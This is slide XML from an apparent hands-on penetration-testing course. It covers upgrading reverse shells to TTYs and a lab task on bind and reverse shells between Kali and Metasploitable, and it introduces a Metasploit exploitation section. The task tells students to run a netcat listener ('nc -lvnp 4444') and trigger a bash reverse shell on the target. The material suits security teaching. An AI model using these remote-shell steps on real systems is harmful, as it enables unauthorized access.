        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/t_nc_listener.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1508760"/>
            <a:ext cx="5577840" cy="2706624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 1" descr="img/t_tty.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="1508760"/>
            <a:ext cx="5239512" cy="2404872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4480560"/>
            <a:ext cx="11091672" cy="1737360"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3684"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="4663440"/>
            <a:ext cx="5486400" cy="320040"/>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Why bother upgrading</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5029200"/>
            <a:ext cx="5120640" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ctrl+C stops killing your session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Arrow keys and history work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="5029200"/>
            <a:ext cx="5120640" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>su, sudo and passwd need a real TTY to run at all</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nano, vim and less stop scrambling your terminal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="135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170A2E"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text 0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="384048"/>
            <a:ext cx="5486400" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="160" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>HANDS-ON  //  TASK 4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9966960" y="329184"/>
            <a:ext cx="1691640" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13889"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9966960" y="329184"/>
            <a:ext cx="1691640" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>10 min</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="749808"/>
            <a:ext cx="9144000" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Shell in both directions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1517904"/>
            <a:ext cx="10789920" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Goal: do it once with the target listening, once with the target calling home, and feel the difference.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2121408"/>
            <a:ext cx="11091672" cy="3703320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1728"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1038"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2377440"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WHAT TO DO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2761488"/>
            <a:ext cx="10424160" cy="2926080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>On Metasploitable, start a bind shell on a port of your choice and connect to it from Kali</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Now do the reverse: start nc -lvnp 4444 on Kali and trigger a bash reverse shell on the target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>In both shells run: id, hostname, ip a</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Upgrade the reverse shell to a proper TTY and try running su</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Work in pairs if you can, one plays attacker, one plays target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>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45</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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0B0711"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4297680" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="12082A"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2011680"/>
            <a:ext cx="3291840" cy="2011680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>06</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="2788920"/>
            <a:ext cx="6675120" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4983480" y="3657600"/>
            <a:ext cx="6583680" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Metasploit, payloads, and turning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>a version number into root.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>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46</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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06 / EXPLOITATION</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What Metasploit actually is</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47</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
